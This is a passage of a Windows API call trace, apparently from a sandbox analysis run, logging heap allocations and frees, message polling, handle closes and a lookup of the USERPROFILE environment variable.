1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.346] FreeLibrary (hLibModule=0x74d40000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.347] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.348] CloseHandle (hObject=0x294) returned 1 [0254.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0254.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0254.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.353] CloseHandle (hObject=0x1f8) returned 1 [0254.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0254.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0254.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0254.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0254.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0254.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4048 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0254.364] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0254.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0254.365] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0254.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.365] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0254.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 